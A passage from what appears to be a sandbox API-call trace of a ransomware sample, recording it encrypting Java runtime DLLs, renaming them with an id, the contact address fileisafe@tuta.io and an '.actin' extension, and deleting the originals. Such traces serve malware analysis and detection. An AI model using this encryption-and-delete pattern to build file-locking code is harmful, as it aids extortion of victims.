files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.123] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0151.123] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.123] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x7440, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7450, dwBufLen=0x7450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7450) returned 1 [0151.335] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x7450, lpOverlapped=0x0) returned 1 [0151.336] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac33f0) returned 1 [0151.336] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0151.336] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.336] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0151.337] CryptDestroyKey (hKey=0xac2e70) returned 1 [0151.337] CloseHandle (hObject=0x308) returned 1 [0151.337] CloseHandle (hObject=0x2f0) returned 1 [0151.337] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java_crw_demo.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java_crw_demo.dll")) returned 1 [0151.338] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.339] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=201792) returned 1 [0151.339] CloseHandle (hObject=0x2f0) returned 1 [0151.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll")) returned 0x20 [0151.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.339] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.340] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.340] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f30) returned 1 [0151.340] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.340] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x31440, lpOverlapped=0x0) returned 1 [0151.344] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x31450, dwBufLen=0x31450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x31450) returned 1 [0151.345] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x31450, lpOverlapped=0x0) returned 1 [0151.348] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac32f0) returned 1 [0151.348] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.348] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.348] CryptDestroyKey (hKey=0xac32f0) returned 1 [0151.348] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.348] CryptDestroyKey (hKey=0xac2f30) returned 1 [0151.348] CloseHandle (hObject=0x2f0) returned 1 [0151.349] CloseHandle (hObject=0x308) returned 1 [0151.349] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll")) returned 1 [0151.351] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.351] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=26688) returned 1 [0151.351] CloseHandle (hObject=0x308) returned 1 [0151.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll")) returned 0x20 [0151.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.352] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.352] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.352] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3230) returned 1 [0151.352] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.352] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x6840, lpOverlapped=0x0) returned 1 [0151.354] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6850, dwBufLen=0x6850 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6850) returned 1 [0151.354] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x6850, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x6850, lpOverlapped=0x0) returned 1 [0151.355] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0151.355] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.355] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0151.355] CryptDestroyKey (hKey=0xac2f30) returned 1 [0151.355] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0151.355] CryptDestroyKey (hKey=0xac3230) returned 1 [0151.355] CloseHandle (hObject=0x308) returned 1 [0151.356] CloseHandle (hObject=0x2f0) returned 1 [0151.356] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfr.dll")) returned 1 [0151.357] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.357] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=139840) returned 1 [0151.357] CloseHandle (hObject=0x2f0) returned 1 [0151.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll")) returned 0x20 [0151.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0151.357] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.357] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.358] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32f0) returned 1 [0151.358] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.358] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x22240, lpOverlapped=0x0) returned 1 [0151.361] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x22250, dwBufLen=0x22250 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x22250) returned 1 [0151.361] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x22250, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x22250, lpOverlapped=0x0) returned 1 [0151.364] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2df0) returned 1 [0151.364] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.364] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.364] CryptDestroyKey (hKey=0xac2df0) returned 1 [0151.364] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.365] CryptDestroyKey (hKey=0xac32f0) returned 1 [0151.365] CloseHandle (hObject=0x2f0) returned 1 [0151.365] CloseHandle (hObject=0x308) returned 1 [0151.365] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxmedia.dll")) returned 1 [0151.366] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.367] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=41503296) returned 1 [0151.367] CloseHandle (hObject=0x308) returned 1 [0151.367] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll")) returned 0x20 [0151.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0151.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.368] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0151.368] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0151.368] ReadFile (in: hFile=0x308, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.639] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0xd318c0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0151.640] ReadFile (in: hFile=0x308, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.676] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x2754a40, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0151.676] ReadFile (in: hFile=0x308, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0151.684] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac34b0) returned 1 [0151.684] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.685] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060) returned 1 [0151.686] CryptDestroyKey (hKey=0xac34b0) returned 1 [0151.686] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0151.686] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef708*=0xc0112, lpOverlapped=0x0) returned 1 [0151.701] SetEndOfFile (hFile=0x308) returned 1 [0151.701] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x2754a40, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0151.701] WriteFile (in: hFile=0x308, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.703] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0xd318c0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0151.703] WriteFile (in: hFile=0x308, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.704] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0151.704] WriteFile (in: hFile=0x308, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0151.705] CloseHandle (hObject=0x308) returned 1 [0151.705] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.754] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=20032) returned 1 [0151.768] CloseHandle (hObject=0x2e0) returned 1 [0151.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll")) returned 0x20 [0151.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.777] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.778] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.778] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0151.778] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.778] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4e40, lpOverlapped=0x0) returned 1 [0151.780] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4e50, dwBufLen=0x4e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4e50) returned 1 [0151.780] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4e50, lpOverlapped=0x0) returned 1 [0151.781] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0151.781] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.781] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.781] CryptDestroyKey (hKey=0xac34b0) returned 1 [0151.781] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.781] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.781] CloseHandle (hObject=0x2e0) returned 1 [0151.781] CloseHandle (hObject=0x308) returned 1 [0151.781] DeleteFileW (lpFileName="\\\\?\\C:\\Program 